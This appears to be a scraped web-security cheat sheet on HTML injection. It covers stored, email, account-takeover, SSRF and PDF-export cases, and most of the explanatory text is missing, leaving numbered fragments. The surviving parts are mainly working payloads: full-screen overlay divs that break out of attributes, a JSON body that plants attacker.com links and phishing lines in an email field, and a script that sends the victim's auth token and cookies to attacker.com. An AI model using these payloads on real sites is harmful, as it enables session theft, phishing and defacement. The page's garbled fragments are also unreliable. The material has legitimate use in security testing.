HTML Injection
Check List
Methodology
Black Box
Stored
1
2
3
4
5
"><div style="position:fixed;top:0;left:0;right:0;bottom:0;background:rgba(0,0,0,1);z-index:2147483647;"></div>6
</p><div style="position:fixed;top:0;left:0;right:0;bottom:0;background:rgba(0,0,0,1);z-index:2147483647;"></div><p>7
8
9
10
Email HTML Injection
1
2
3
4
5
"street": "https://attacker.com",
"formattedAddress": "https://attacker.com"6
{
"address": {
"street": "https://attacker.com",
"formattedAddress": "https://attacker.com",
"city": "Click here for your free valuation",
"postalCode": "https://attacker.com"
},
"email": "victim@company.com",
"name": "Please click the link below"
}7
8
9
10
Email Invite Manipulation
1
2
3
<img src="https://miro.app.com/v2/resize:fit:720/format:webp/0*y2OAF_DSarBAjihO.jpg">4
5
6
Account Takeover
1
2
<div class="remote-pagination-container">
<div class="pagination">
<a href="/cloudinary/images/your_image_id?options[delivery_type]=upload">Next page →</a>
</div>
</div>3
4
5
6
7
<script>fetch('https://attacker.com/steal?token='+localStorage.getItem('auth_token')+'&cookie='+document.cookie)</script>Save the modified image as new file (still valid JPEG)8
9
10
<div class="remote-pagination-container">
<div class="pagination">
<a href="/cloudinary/images/s--NewMaliciousID--/?options[delivery_type]=upload">Next →</a>
</div>
</div>11
12
Send Message Functionality HTML Injection to Server Side Request Forgery
1
2
3
4
5
6
7
8
9
10
11
Server File Reading via PDF Export
1
2
3
4
5
6
7
8
9
10
11
HTML injection in search UI
1
2
3
4
5
White Box
Cheat Sheet
Last updated